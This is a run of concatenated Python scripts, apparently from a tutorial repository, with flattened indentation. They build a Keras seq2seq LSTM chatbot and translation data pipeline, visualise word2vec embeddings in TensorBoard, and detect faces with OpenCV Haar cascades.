# define the model without training
sess = tf.InteractiveSession()
embedding = tf.Variable(placeholder, trainable=False, name='w2x_metadata')
tf.global_variables_initializer().run()
saver = tf.train.Saver()
writer = tf.summary.FileWriter(output_path, sess.graph)
# adding into projector
config = projector.ProjectorConfig()
embed = config.embeddings.add()
embed.tensor_name = 'w2x_metadata'
embed.metadata_path = meta_file
# Specify the width and height of a single thumbnail.
projector.visualize_embeddings(writer, config)
saver.save(sess, os.path.join(output_path, 'w2x_metadata.ckpt'))
print('Run tensorboard --logdir={0} to run visualize result on tensorboard'.format(output_path))
if __name__ == "__main__":
"""
Use model.save_word2vec_format to save w2v_model as word2evc format
Then just run python w2v_visualizer.py word2vec.text visualize_result
"""
try:
model_path = sys.argv[1]
output_path = sys.argv[2]
except:
print("Please provice model path and output path")
model = KeyedVectors.load_word2vec_format(model_path)
pathlib.Path(output_path).mkdir(parents=True, exist_ok=True)
visualize(model, output_path)
from keras.preprocessing.text import Tokenizer
from keras.preprocessing.sequence import pad_sequences
from keras.utils import to_categorical
import numpy as np
import pickle
import tqdm
class NMTGenerator:
"""A class utility for generating Neural-Machine-Translation large datasets"""
def __init__(self, source_file, target_file, num_encoder_tokens=None, num_decoder_tokens=None,
source_sequence_length=None, target_sequence_length=None, x_tk=None, y_tk=None,
batch_size=256, validation_split=0.15, load_tokenizers=False, dump_tokenizers=True,
same_tokenizer=False, char_level=False, verbose=0):
self.source_file = source_file
self.target_file = target_file
self.same_tokenizer = same_tokenizer
self.char_level = char_level
if not load_tokenizers:
# x ( source ) tokenizer
self.x_tk = x_tk if x_tk else Tokenizer(char_level=self.char_level)
# y ( target ) tokenizer
self.y_tk = y_tk if y_tk else Tokenizer(char_level=self.char_level)
else:
self.x_tk = pickle.load(open("results/x_tk.pickle", "rb"))
self.y_tk = pickle.load(open("results/y_tk.pickle", "rb"))
# remove '?' and '.' from filters
# which means include them in vocabulary
# add "'" to filters
self.x_tk.filters = self.x_tk.filters.replace("?", "").replace("_", "") + "'"
self.y_tk.filters = self.y_tk.filters.replace("?", "").replace("_", "") + "'"
if char_level:
self.x_tk.filters = self.x_tk.filters.replace(".", "").replace(",", "")
self.y_tk.filters = self.y_tk.filters.replace(".", "").replace(",", "")
if same_tokenizer:
self.y_tk = self.x_tk
# max sequence length of source language
self.source_sequence_length = source_sequence_length
# max sequence length of target language
self.target_sequence_length = target_sequence_length
# vocab size of encoder
self.num_encoder_tokens = num_encoder_tokens
# vocab size of decoder
self.num_decoder_tokens = num_decoder_tokens
# the batch size
self.batch_size = batch_size
# the ratio which the dataset will be partitioned
self.validation_split = validation_split
# whether to dump x_tk and y_tk when finished tokenizing
self.dump_tokenizers = dump_tokenizers
# cap to remove _unk_ samples
self.n_unk_to_remove = 2
self.verbose = verbose
def load_dataset(self):
"""Loads the dataset:
1. load the data from files
2. tokenize and calculate sequence lengths and num_tokens
3. post pad the sequences"""
self.load_data()
if self.verbose:
print("[+] Data loaded")
self.tokenize()
if self.verbose:
print("[+] Text tokenized")
self.pad_sequences()
if self.verbose:
print("[+] Sequences padded")
self.split_data()
if self.verbose:
print("[+] Data splitted")
def load_data(self):
"""Loads data from files"""
self.X = load_data(self.source_file)
self.y = load_data(self.target_file)
# remove much unks on a single sample
X, y = [], []
co = 0
for question, answer in zip(self.X, self.y):
if question.count("_unk_") >= self.n_unk_to_remove or answer.count("_unk_") >= self.n_unk_to_remove:
co += 1
else:
X.append(question)
y.append(answer)
self.X = X
self.y = y
if self.verbose >= 1:
print("[*] Number of samples:", len(self.X))
if self.verbose >= 2:
print("[!] Number of samples deleted:", co)
def tokenize(self):
"""Tokenizes sentences/strings as well as calculating input/output sequence lengths
and input/output vocab sizes"""
self.x_tk.fit_on_texts(self.X)
self.y_tk.fit_on_texts(self.y)
self.X = self.x_tk.texts_to_sequences(self.X)
self.y = self.y_tk.texts_to_sequences(self.y)
# calculate both sequence lengths ( source and target )
self.source_sequence_length = max([len(x) for x in self.X])
self.target_sequence_length = max([len(x) for x in self.y])
# calculating number of encoder/decoder vocab sizes
self.num_encoder_tokens = len(self.x_tk.index_word) + 1
self.num_decoder_tokens = len(self.y_tk.index_word) + 1
# dump tokenizers
pickle.dump(self.x_tk, open("results/x_tk.pickle", "wb"))
pickle.dump(self.y_tk, open("results/y_tk.pickle", "wb"))
def pad_sequences(self):
"""Pad sequences"""
self.X = pad_sequences(self.X, maxlen=self.source_sequence_length, padding='post')
self.y = pad_sequences(self.y, maxlen=self.target_sequence_length, padding='post')
def split_data(self):
"""split training/validation sets using self.validation_split"""
split_value = int(len(self.X)*self.validation_split)
self.X_test = self.X[:split_value]
self.X_train = self.X[split_value:]
self.y_test = self.y[:split_value]
self.y_train = self.y[split_value:]
# free up memory
del self.X
del self.y
def shuffle_data(self, train=True):
"""Shuffles X and y together
:params train (bool): whether to shuffle training data, default is True
Note that when train is False, testing data is shuffled instead."""
state = np.random.get_state()
if train:
np.random.shuffle(self.X_train)
np.random.set_state(state)
np.random.shuffle(self.y_train)
else:
np.random.shuffle(self.X_test)
np.random.set_state(state)
np.random.shuffle(self.y_test)
def next_train(self):
"""Training set generator"""
return self.generate_batches(self.X_train, self.y_train, train=True)
def next_validation(self):
"""Validation set generator"""
return self.generate_batches(self.X_test, self.y_test, train=False)
def generate_batches(self, X, y, train=True):
"""Data generator"""
same_tokenizer = self.same_tokenizer
batch_size = self.batch_size
char_level = self.char_level
source_sequence_length = self.source_sequence_length
target_sequence_length = self.target_sequence_length
if same_tokenizer:
num_encoder_tokens = max([self.num_encoder_tokens, self.num_decoder_tokens])
num_decoder_tokens = num_encoder_tokens
else:
num_encoder_tokens = self.num_encoder_tokens
num_decoder_tokens = self.num_decoder_tokens
while True:
for j in range(0, len(X), batch_size):
encoder_input_data = X[j: j+batch_size]
decoder_input_data = y[j: j+batch_size]
# update batch size ( different size in last batch of the dataset )
batch_size = encoder_input_data.shape[0]
if self.char_level:
encoder_data = np.zeros((batch_size, source_sequence_length, num_encoder_tokens))
decoder_data = np.zeros((batch_size, target_sequence_length, num_decoder_tokens))
else:
encoder_data = encoder_input_data
decoder_data = decoder_input_data
decoder_target_data = np.zeros((batch_size, target_sequence_length, num_decoder_tokens))
if char_level:
# if its char level, one-hot all sequences of characters
for i, sequence in enumerate(decoder_input_data):
for t, word_index in enumerate(sequence):
if t > 0:
decoder_target_data[i, t - 1, word_index] = 1
decoder_data[i, t, word_index] = 1
for i, sequence in enumerate(encoder_input_data):
for t, word_index in enumerate(sequence):
encoder_data[i, t, word_index] = 1
else:
# if its word level, one-hot only target_data ( the one compared with dense )
for i, sequence in enumerate(decoder_input_data):
for t, word_index in enumerate(sequence):
if t > 0:
decoder_target_data[i, t - 1, word_index] = 1
yield ([encoder_data, decoder_data], decoder_target_data)
# shuffle data when an epoch is finished
self.shuffle_data(train=train)
def get_embedding_vectors(tokenizer):
embedding_index = {}
with open("data/glove.6B.300d.txt", encoding='utf8') as f:
for line in tqdm.tqdm(f, "Reading GloVe"):
values = line.split()
word = values[0]
vectors = np.asarray(values[1:], dtype='float32')
embedding_index[word] = vectors
word_index = tokenizer.word_index
embedding_matrix = np.zeros((len(word_index)+1, 300))
for word, i in word_index.items():
embedding_vector = embedding_index.get(word)
if embedding_vector is not None:
# words not found will be 0s
embedding_matrix[i] = embedding_vector
return embedding_matrix
def load_data(filename):
text = []
append = text.append
with open(filename) as f:
for line in tqdm.tqdm(f, f"Reading {filename}"):
line = line.strip()
append(line)
return text
# def generate_batch(X, y, num_decoder_tokens, max_length_src, max_length_target, batch_size=256):
# """Generating data"""
# while True:
# for j in range(0, len(X), batch_size):
# encoder_input_data = np.zeros((batch_size, max_length_src), dtype='float32')
# decoder_input_data = np.zeros((batch_size, max_length_target), dtype='float32')
# decoder_target_data = np.zeros((batch_size, max_length_target, num_decoder_tokens), dtype='float32')
# for i, (input_text, target_text) in enumerate(zip(X[j: j+batch_size], y[j: j+batch_size])):
# for t, word in enumerate(input_text.split()):
# encoder_input_data[i, t] = input_word_index[word] # encoder input sequence
# for t, word in enumerate(target_text.split()):
# if t > 0:
# # offset by one timestep
# # one-hot encoded
# decoder_target_data[i, t-1, target_token_index[word]] = 1
# if t < len(target_text.split()) - 1:
# decoder_input_data[i, t] = target_token_index[word]
# yield ([encoder_input_data, decoder_input_data], decoder_target_data)
# def tokenize(x, tokenizer=None):
# """Tokenize x
# :param x: List of sentences/strings to be tokenized
# :return: Tuple of (tokenized x data, tokenizer used to tokenize x)"""
# if tokenizer:
# t = tokenizer
# else:
# t = Tokenizer()
# t.fit_on_texts(x)
# return t.texts_to_sequences(x), t
# def pad(x, length=None):
# """Pad x
# :param x: list of sequences
# :param length: Length to pad the sequence to, If None, use length
# of longest sequence in x.
# :return: Padded numpy array of sequences"""
# return pad_sequences(x, maxlen=length, padding="post")
# def preprocess(x, y):
# """Preprocess x and y
# :param x: Feature list of sentences
# :param y: Label list of sentences
# :return: Tuple of (preprocessed x, preprocessed y, x tokenizer, y tokenizer)"""
# preprocess_x, x_tk = tokenize(x)
# preprocess_y, y_tk = tokenize(y)
# preprocess_x2 = [ [0] + s for s in preprocess_y ]
# longest_x = max([len(i) for i in preprocess_x])
# longest_y = max([len(i) for i in preprocess_y]) + 1
# # max_length = len(x_tk.word_index) if len(x_tk.word_index) > len(y_tk.word_index) else len(y_tk.word_index)
# max_length = longest_x if longest_x > longest_y else longest_y
# preprocess_x = pad(preprocess_x, length=max_length)
# preprocess_x2 = pad(preprocess_x2, length=max_length)
# preprocess_y = pad(preprocess_y, length=max_length)
# # preprocess_x = to_categorical(preprocess_x)
# # preprocess_x2 = to_categorical(preprocess_x2)
# preprocess_y = to_categorical(preprocess_y)
# return preprocess_x, preprocess_x2, preprocess_y, x_tk, y_tk
from keras.layers import Embedding, TimeDistributed, Dense, GRU, LSTM, Input
from keras.models import Model, Sequential
from keras.utils import to_categorical
import numpy as np
import tqdm
def encoder_decoder_model(num_encoder_tokens, latent_dim, num_decoder_tokens, embedding_matrix=None, embedding_layer=True):
# ENCODER
# define an input sequence and process it
if embedding_layer:
encoder_inputs = Input(shape=(None,))
if embedding_matrix is None:
encoder_emb_layer = Embedding(num_encoder_tokens, latent_dim, mask_zero=True)
else:
encoder_emb_layer = Embedding(num_encoder_tokens,
latent_dim,
mask_zero=True,
weights=[embedding_matrix],
trainable=False)
encoder_emb = encoder_emb_layer(encoder_inputs)
else:
encoder_inputs = Input(shape=(None, num_encoder_tokens))
encoder_emb = encoder_inputs
encoder_lstm = LSTM(latent_dim, return_state=True)
encoder_outputs, state_h, state_c = encoder_lstm(encoder_emb)
# we discard encoder_outputs and only keep the states
encoder_states = [state_h, state_c]
# DECODER
# Set up the decoder, using encoder_states as initial state
if embedding_layer:
decoder_inputs = Input(shape=(None,))
else:
decoder_inputs = Input(shape=(None, num_encoder_tokens))
# add an embedding layer
# decoder_emb_layer = Embedding(num_decoder_tokens, latent_dim, mask_zero=True)
if embedding_layer:
decoder_emb = encoder_emb_layer(decoder_inputs)
else:
decoder_emb = decoder_inputs
# we set up our decoder to return full output sequences
# and to return internal states as well, we don't use the
# return states in the training model, but we will use them in inference
decoder_lstm = LSTM(latent_dim, return_sequences=True, return_state=True)
decoder_outputs, _, _, = decoder_lstm(decoder_emb, initial_state=encoder_states)
# dense output layer used to predict each character ( or word )
# in one-hot manner, not recursively
decoder_dense = Dense(num_decoder_tokens, activation="softmax")
decoder_outputs = decoder_dense(decoder_outputs)
# finally, the model is defined with inputs for the encoder and the decoder
# and the output target sequence
# turn encoder_input_data & decoder_input_data into decoder_target_data
model = Model([encoder_inputs, decoder_inputs], output=decoder_outputs)
# model.summary()
# define encoder inference model
encoder_model = Model(encoder_inputs, encoder_states)
# define decoder inference model
decoder_state_input_h = Input(shape=(latent_dim,))
decoder_state_input_c = Input(shape=(latent_dim,))
decoder_states_inputs = [decoder_state_input_h, decoder_state_input_c]
# Get the embeddings of the decoder sequence
if embedding_layer:
dec_emb2 = encoder_emb_layer(decoder_inputs)
else:
dec_emb2 = decoder_inputs
decoder_outputs, state_h, state_c = decoder_lstm(dec_emb2, initial_state=decoder_states_inputs)
decoder_states = [state_h, state_c]
decoder_outputs = decoder_dense(decoder_outputs)
decoder_model = Model([decoder_inputs] + decoder_states_inputs, [decoder_outputs] + decoder_states)
return model, encoder_model, decoder_model
def predict_sequence(enc, dec, source, n_steps, cardinality, char_level=False):
"""Generate target given source sequence, this function can be used
after the model is trained to generate a target sequence given a source sequence."""
# encode
state = enc.predict(source)
# start of sequence input
if char_level:
target_seq = np.zeros((1, 1, 61))
else:
target_seq = np.zeros((1, 1))
# collect predictions
output = []
for t in range(n_steps):
# predict next char
yhat, h, c = dec.predict([target_seq] + state)
# store predictions
y = yhat[0, 0, :]
if char_level:
sampled_token_index = to_categorical(np.argmax(y), num_classes=61)
else:
sampled_token_index = np.argmax(y)
output.append(sampled_token_index)
# update state
state = [h, c]
# update target sequence
if char_level:
target_seq = np.zeros((1, 1, 61))
else:
target_seq = np.zeros((1, 1))
target_seq[0, 0] = sampled_token_index
return np.array(output)
def decode_sequence(enc, dec, input_seq):
# Encode the input as state vectors.
states_value = enc.predict(input_seq)
# Generate empty target sequence of length 1.
target_seq = np.zeros((1,1))
# Populate the first character of target sequence with the start character.
target_seq[0, 0] = 0
# Sampling loop for a batch of sequences
# (to simplify, here we assume a batch of size 1).
stop_condition = False
decoded_sequence = []
while not stop_condition:
output_tokens, h, c = dec.predict([target_seq] + states_value)
# Sample a token
sampled_token_index = np.argmax(output_tokens[0, -1, :])
# sampled_char = reverse_target_char_index[sampled_token_index]
decoded_sentence.append(output_tokens[0, -1, :])
# Exit condition: either hit max length or find stop token.
if (output_tokens == '<PAD>' or len(decoded_sentence) > 50):
stop_condition = True
# Update the target sequence (of length 1).
target_seq = np.zeros((1,1))
target_seq[0, 0] = sampled_token_index
# Update states
states_value = [h, c]
return decoded_sentence
from keras.preprocessing.text import Tokenizer
from keras.preprocessing.sequence import pad_sequences
from keras.utils import to_categorical
import numpy as np
def tokenize(x, tokenizer=None):
"""Tokenize x
:param x: List of sentences/strings to be tokenized
:return: Tuple of (tokenized x data, tokenizer used to tokenize x)"""
if tokenizer:
t = tokenizer
else:
t = Tokenizer()
t.fit_on_texts(x)
return t.texts_to_sequences(x), t
def pad(x, length=None):
"""Pad x
:param x: list of sequences
:param length: Length to pad the sequence to, If None, use length
of longest sequence in x.
:return: Padded numpy array of sequences"""
return pad_sequences(x, maxlen=length, padding="post")
def preprocess(x, y):
"""Preprocess x and y
:param x: Feature list of sentences
:param y: Label list of sentences
:return: Tuple of (preprocessed x, preprocessed y, x tokenizer, y tokenizer)"""
preprocess_x, x_tk = tokenize(x)
preprocess_y, y_tk = tokenize(y)
preprocess_x2 = [ [0] + s for s in preprocess_y ]
longest_x = max([len(i) for i in preprocess_x])
longest_y = max([len(i) for i in preprocess_y]) + 1
# max_length = len(x_tk.word_index) if len(x_tk.word_index) > len(y_tk.word_index) else len(y_tk.word_index)
max_length = longest_x if longest_x > longest_y else longest_y
preprocess_x = pad(preprocess_x, length=max_length)
preprocess_x2 = pad(preprocess_x2, length=max_length)
preprocess_y = pad(preprocess_y, length=max_length)
# preprocess_x = to_categorical(preprocess_x)
# preprocess_x2 = to_categorical(preprocess_x2)
preprocess_y = to_categorical(preprocess_y)
return preprocess_x, preprocess_x2, preprocess_y, x_tk, y_tk
def load_data(filename):
with open(filename) as f:
text = f.read()
return text.split("\n")
def load_dataset():
english_sentences = load_data("data/small_vocab_en")
french_sentences = load_data("data/small_vocab_fr")
return preprocess(english_sentences, french_sentences)
# def generate_batch(X, y, num_decoder_tokens, max_length_src, max_length_target, batch_size=256):
# """Generating data"""
# while True:
# for j in range(0, len(X), batch_size):
# encoder_input_data = np.zeros((batch_size, max_length_src), dtype='float32')
# decoder_input_data = np.zeros((batch_size, max_length_target), dtype='float32')
# decoder_target_data = np.zeros((batch_size, max_length_target, num_decoder_tokens), dtype='float32')
# for i, (input_text, target_text) in enumerate(zip(X[j: j+batch_size], y[j: j+batch_size])):
# for t, word in enumerate(input_text.split()):
# encoder_input_data[i, t] = input_word_index[word] # encoder input sequence
# for t, word in enumerate(target_text.split()):
# if t > 0:
# # offset by one timestep
# # one-hot encoded
# decoder_target_data[i, t-1, target_token_index[word]] = 1
# if t < len(target_text.split()) - 1:
# decoder_input_data[i, t] = target_token_index[word]
# yield ([encoder_input_data, decoder_input_data], decoder_target_data)
if __name__ == "__main__":
from generator import NMTGenerator
gen = NMTGenerator(source_file="data/small_vocab_en", target_file="data/small_vocab_fr")
gen.load_dataset()
print(gen.num_decoder_tokens)
print(gen.num_encoder_tokens)
print(gen.source_sequence_length)
print(gen.target_sequence_length)
print(gen.X.shape)
print(gen.y.shape)
for i, ((encoder_input_data, decoder_input_data), decoder_target_data) in enumerate(gen.generate_batches()):
# print("encoder_input_data.shape:", encoder_input_data.shape)
# print("decoder_output_data.shape:", decoder_input_data.shape)
if i % (len(gen.X) // gen.batch_size + 1) == 0:
print(i, ": decoder_input_data:", decoder_input_data[0])
# to use CPU
import os
os.environ["CUDA_DEVICE_ORDER"] = "PCI_BUS_ID" # see issue #152
os.environ["CUDA_VISIBLE_DEVICES"] = "-1"
import tensorflow as tf
config = tf.ConfigProto(intra_op_parallelism_threads=5,
inter_op_parallelism_threads=5,
allow_soft_placement=True,
device_count = {'CPU' : 1,
'GPU' : 0}
)
from models import predict_sequence, encoder_decoder_model
from preprocess import tokenize, pad
from keras.utils import to_categorical
from generator import get_embedding_vectors
import pickle
import numpy as np
x_tk = pickle.load(open("results/x_tk.pickle", "rb"))
y_tk = pickle.load(open("results/y_tk.pickle", "rb"))
index_to_words = {id: word for word, id in y_tk.word_index.items()}
index_to_words[0] = '_'
def logits_to_text(logits):
"""
Turn logits from a neural network into text using the tokenizer
:param logits: Logits from a neural network
:param tokenizer: Keras Tokenizer fit on the labels
:return: String that represents the text of the logits
"""
# return ' '.join([index_to_words[prediction] for prediction in np.argmax(logits, 1)])
return ' '.join([index_to_words[prediction] for prediction in logits])
num_encoder_tokens = 29046
num_decoder_tokens = 29046
latent_dim = 300
# embedding_vectors = get_embedding_vectors(x_tk)
model, enc, dec = encoder_decoder_model(num_encoder_tokens, latent_dim, num_decoder_tokens)
enc.summary()
dec.summary()
model.summary()
model.load_weights("results/chatbot_v13_4.831_0.219.h5")
while True:
text = input("> ")
tokenized = tokenize([text], tokenizer=y_tk)[0]
# print("tokenized:", tokenized)
X = pad(tokenized, length=37)
sequence = predict_sequence(enc, dec, X, 37, num_decoder_tokens)
# print(sequence)
result = logits_to_text(sequence)
print(result)
# to use CPU
import os
os.environ["CUDA_DEVICE_ORDER"] = "PCI_BUS_ID" # see issue #152
os.environ["CUDA_VISIBLE_DEVICES"] = "-1"
import tensorflow as tf
config = tf.ConfigProto(intra_op_parallelism_threads=5,
inter_op_parallelism_threads=5,
allow_soft_placement=True,
device_count = {'CPU' : 1,
'GPU' : 0}
)
from models import predict_sequence, encoder_decoder_model
from preprocess import tokenize, pad
from keras.utils import to_categorical
from generator import get_embedding_vectors
import pickle
import numpy as np
x_tk = pickle.load(open("results/x_tk.pickle", "rb"))
y_tk = pickle.load(open("results/y_tk.pickle", "rb"))
index_to_words = {id: word for word, id in y_tk.word_index.items()}
index_to_words[0] = '_'
def logits_to_text(logits):
"""
Turn logits from a neural network into text using the tokenizer
:param logits: Logits from a neural network
:param tokenizer: Keras Tokenizer fit on the labels
:return: String that represents the text of the logits
"""
# return ' '.join([index_to_words[prediction] for prediction in np.argmax(logits, 1)])
# return ''.join([index_to_words[np.where(prediction==1)[0]] for prediction in logits])
text = ""
for prediction in logits:
char_index = np.where(prediction)[0][0]
char = index_to_words[char_index]
text += char
return text
num_encoder_tokens = 61
num_decoder_tokens = 61
latent_dim = 384
# embedding_vectors = get_embedding_vectors(x_tk)
model, enc, dec = encoder_decoder_model(num_encoder_tokens, latent_dim, num_decoder_tokens, embedding_layer=False)
enc.summary()
dec.summary()
model.summary()
model.load_weights("results/chatbot_charlevel_v2_0.32_0.90.h5")
while True:
text = input("> ")
tokenized = tokenize([text], tokenizer=y_tk)[0]
# print("tokenized:", tokenized)
X = to_categorical(pad(tokenized, length=37), num_classes=num_encoder_tokens)
# print(X)
sequence = predict_sequence(enc, dec, X, 206, num_decoder_tokens, char_level=True)
# print(sequence)
result = logits_to_text(sequence)
print(result)
import numpy as np
import pickle
from models import encoder_decoder_model
from generator import NMTGenerator, get_embedding_vectors
from preprocess import load_dataset
from keras.callbacks import ModelCheckpoint
from keras_adabound import AdaBound
text_gen = NMTGenerator(source_file="data/questions",
target_file="data/answers",
batch_size=32,
same_tokenizer=True,
verbose=2)
text_gen.load_dataset()
print("[+] Dataset loaded.")
num_encoder_tokens = text_gen.num_encoder_tokens
num_decoder_tokens = text_gen.num_decoder_tokens
# get tokenizer
tokenizer = text_gen.x_tk
embedding_vectors = get_embedding_vectors(tokenizer)
print("text_gen.source_sequence_length:", text_gen.source_sequence_length)
print("text_gen.target_sequence_length:", text_gen.target_sequence_length)
num_tokens = max([num_encoder_tokens, num_decoder_tokens])
latent_dim = 300
model, enc, dec = encoder_decoder_model(num_tokens, latent_dim, num_tokens, embedding_matrix=embedding_vectors)
model.summary()
enc.summary()
dec.summary()
del enc
del dec
print("[+] Models created.")
model.compile(optimizer="rmsprop", loss="categorical_crossentropy", metrics=["accuracy"])
print("[+] Model compiled.")
# pickle.dump(x_tk, open("results/x_tk.pickle", "wb"))
print("[+] X tokenizer serialized.")
# pickle.dump(y_tk, open("results/y_tk.pickle", "wb"))
print("[+] y tokenizer serialized.")
# X = X.reshape((X.shape[0], X.shape[2], X.shape[1]))
# y = y.reshape((y.shape[0], y.shape[2], y.shape[1]))
print("[+] Dataset reshaped.")
# print("X1.shape:", X1.shape)
# print("X2.shape:", X2.shape)
# print("y.shape:", y.shape)
checkpointer = ModelCheckpoint("results/chatbot_v13_{val_loss:.3f}_{val_acc:.3f}.h5", save_best_only=False, verbose=1)
model.load_weights("results/chatbot_v13_4.806_0.219.h5")
# model.fit([X1, X2], y,
model.fit_generator(text_gen.next_train(),
validation_data=text_gen.next_validation(),
verbose=1,
steps_per_epoch=(len(text_gen.X_train) // text_gen.batch_size),
validation_steps=(len(text_gen.X_test) // text_gen.batch_size),
callbacks=[checkpointer],
epochs=5)
print("[+] Model trained.")
model.save_weights("results/chatbot_v13.h5")
print("[+] Model saved.")
import numpy as np
import pickle
from models import encoder_decoder_model
from generator import NMTGenerator, get_embedding_vectors
from preprocess import load_dataset
from keras.callbacks import ModelCheckpoint
from keras_adabound import AdaBound
text_gen = NMTGenerator(source_file="data/questions",
target_file="data/answers",
batch_size=256,
same_tokenizer=True,
char_level=True,
verbose=2)
text_gen.load_dataset()
print("[+] Dataset loaded.")
num_encoder_tokens = text_gen.num_encoder_tokens
num_decoder_tokens = text_gen.num_decoder_tokens
# get tokenizer
tokenizer = text_gen.x_tk
print("text_gen.source_sequence_length:", text_gen.source_sequence_length)
print("text_gen.target_sequence_length:", text_gen.target_sequence_length)
num_tokens = max([num_encoder_tokens, num_decoder_tokens])
latent_dim = 384
model, enc, dec = encoder_decoder_model(num_tokens, latent_dim, num_tokens, embedding_layer=False)
model.summary()
enc.summary()
dec.summary()
del enc
del dec
print("[+] Models created.")
model.compile(optimizer=AdaBound(lr=1e-3, final_lr=0.1), loss="categorical_crossentropy", metrics=["accuracy"])
print("[+] Model compiled.")
# pickle.dump(x_tk, open("results/x_tk.pickle", "wb"))
print("[+] X tokenizer serialized.")
# pickle.dump(y_tk, open("results/y_tk.pickle", "wb"))
print("[+] y tokenizer serialized.")
# X = X.reshape((X.shape[0], X.shape[2], X.shape[1]))
# y = y.reshape((y.shape[0], y.shape[2], y.shape[1]))
print("[+] Dataset reshaped.")
# print("X1.shape:", X1.shape)
# print("X2.shape:", X2.shape)
# print("y.shape:", y.shape)
checkpointer = ModelCheckpoint("results/chatbot_charlevel_v2_{val_loss:.2f}_{val_acc:.2f}.h5", save_best_only=False, verbose=1)
model.load_weights("results/chatbot_charlevel_v2_0.32_0.90.h5")
# model.fit([X1, X2], y,
model.fit_generator(text_gen.next_train(),
validation_data=text_gen.next_validation(),
verbose=1,
steps_per_epoch=(len(text_gen.X_train) // text_gen.batch_size)+1,
validation_steps=(len(text_gen.X_test) // text_gen.batch_size)+1,
callbacks=[checkpointer],
epochs=50)
print("[+] Model trained.")
model.save_weights("results/chatbot_charlevel_v2.h5")
print("[+] Model saved.")
import tqdm
X, y = [], []
with open("data/fr-en", encoding='utf8') as f:
for i, line in tqdm.tqdm(enumerate(f), "Reading file"):
if "europarl-v7" in line:
continue
# X.append(line)
# if i == 2007723 or i == 2007724 or i == 2007725
if i <= 2007722:
X.append(line.strip())
else:
y.append(line.strip())
y.pop(-1)
with open("data/en", "w", encoding='utf8') as f:
for i in tqdm.tqdm(X, "Writing english"):
print(i, file=f)
with open("data/fr", "w", encoding='utf8') as f:
for i in tqdm.tqdm(y, "Writing french"):
print(i, file=f)
import glob
import tqdm
import os
import random
import inflect
p = inflect.engine()
X, y = [], []
special_words = {
"haha", "rockikz", "fullclip", "xanthoss", "aw", "wow", "ah", "oh", "god", "quran", "allah",
"muslims", "muslim", "islam", "?", ".", ",",
'_func_val_get_callme_para1_comma0', '_num2_', '_func_val_get_last_question', '_num1_',
'_func_val_get_number_plus_para1__num1__para2__num2_',
'_func_val_update_call_me_enforced_para1__callme_',
'_func_val_get_number_minus_para1__num2__para2__num1_', '_func_val_get_weekday_para1_d0',
'_func_val_update_user_name_para1__name_', '_callme_', '_func_val_execute_pending_action_and_reply_para1_no',
'_func_val_clear_user_name_and_call_me', '_func_val_get_story_name_para1_the_velveteen_rabbit', '_ignored_',
'_func_val_get_number_divide_para1__num1__para2__num2_', '_func_val_get_joke_anyQ:',
'_func_val_update_user_name_and_call_me_para1__name__para2__callme_', '_func_val_get_number_divide_para1__num2__para2__num1_Q:',
'_name_', '_func_val_ask_name_if_not_yet', '_func_val_get_last_answer', '_func_val_continue_last_topic',
'_func_val_get_weekday_para1_d1', '_func_val_get_number_minus_para1__num1__para2__num2_', '_func_val_get_joke_any',
'_func_val_get_story_name_para1_the_three_little_pigs', '_func_val_update_call_me_para1__callme_',
'_func_val_get_story_name_para1_snow_white', '_func_val_get_today', '_func_val_get_number_multiply_para1__num1__para2__num2_',
'_func_val_update_user_name_enforced_para1__name_', '_func_val_get_weekday_para1_d_2', '_func_val_correct_user_name_para1__name_',
'_func_val_get_time', '_func_val_get_number_divide_para1__num2__para2__num1_', '_func_val_get_story_any',
'_func_val_execute_pending_action_and_reply_para1_yes', '_func_val_get_weekday_para1_d_1', '_func_val_get_weekday_para1_d2'
}
english_words = { word.strip() for word in open("data/words8.txt") }
embedding_words = set()
f = open("data/glove.6B.300d.txt", encoding='utf8')
for line in tqdm.tqdm(f, "Reading GloVe words"):
values = line.split()
word = values[0]
embedding_words.add(word)
maps = open("data/maps.txt").readlines()
word_mapper = {}
for map in maps:
key, value = map.split("=>")
key = key.strip()
value = value.strip()
print(f"Mapping {key} to {value}")
word_mapper[key.lower()] = value
unks = 0
digits = 0
mapped = 0
english = 0
special = 0
def map_text(line):
global unks
global digits
global mapped
global english
global special
result = []
append = result.append
words = line.split()
for word in words:
word = word.lower()
if word.isdigit():
append(p.number_to_words(word))
digits += 1
continue
if word in word_mapper:
append(word_mapper[word])
mapped += 1
continue
if word in english_words:
append(word)
english += 1
continue
if word in special_words:
append(word)
special += 1
continue
append("_unk_")
unks += 1
return ' '.join(result)
for file in tqdm.tqdm(glob.glob("data/Augment*/*"), "Reading files"):
with open(file, encoding='utf8') as f:
for line in f:
line = line.strip()
if "Q: " in line:
X.append(line)
elif "A: " in line:
y.append(line)
# shuffle X and y maintaining the order
combined = list(zip(X, y))
random.shuffle(combined)
X[:], y[:] = zip(*combined)
with open("data/questions", "w") as f:
for line in tqdm.tqdm(X, "Writing questions"):
line = line.strip().lstrip('Q: ')
line = map_text(line)
print(line, file=f)
print()
print("[!] Unks:", unks)
print("[!] digits:", digits)
print("[!] Mapped:", mapped)
print("[!] english:", english)
print("[!] special:", special)
print()
unks = 0
digits = 0
mapped = 0
english = 0
special = 0
with open("data/answers", "w") as f:
for line in tqdm.tqdm(y, "Writing answers"):
line = line.strip().lstrip('A: ')
line = map_text(line)
print(line, file=f)
print()
print("[!] Unks:", unks)
print("[!] digits:", digits)
print("[!] Mapped:", mapped)
print("[!] english:", english)
print("[!] special:", special)
print()
import numpy as np
import cv2
# loading the test image
image = cv2.imread("kids.jpg")
# converting to grayscale
image_gray = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)
# initialize the face recognizer (default face haar cascade)
face_cascade = cv2.CascadeClassifier("cascades/haarcascade_fontalface_default.xml")
# detect all the faces in the image
faces = face_cascade.detectMultiScale(image_gray, 1.3, 5)
# for every face, draw a blue rectangle
for x, y, width, height in faces:
cv2.rectangle(image, (x, y), (x + width, y + height), color=(255, 0, 0), thickness=2)
# save the image with rectangles
cv2.imwrite("kids_detected.jpg", image)
import numpy as np
import cv2
# create a new cam object
cap = cv2.VideoCapture(0)
# initialize the face recognizer (default face haar cascade)
face_cascade = cv2.CascadeClassifier("cascades/haarcascade_fontalface_default.xml")
while True:
# read the image from the cam
_, image = cap.read()
# converting to grayscale
image_gray = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)
# detect all the faces in the image
faces = face_cascade.detectMultiScale(image_gray, 1.3, 5)
# for every face, draw a blue rectangle
for x, y, width, height in faces:
cv2.rectangle(image, (x, y), (x + width, y + height), color=(255, 0, 0), thickness=2)
cv2.imshow("image", image)
if cv2.waitKey(1) == ord("q"):
break
cap.release()
cv2.destroyAllWindows()
import cv2
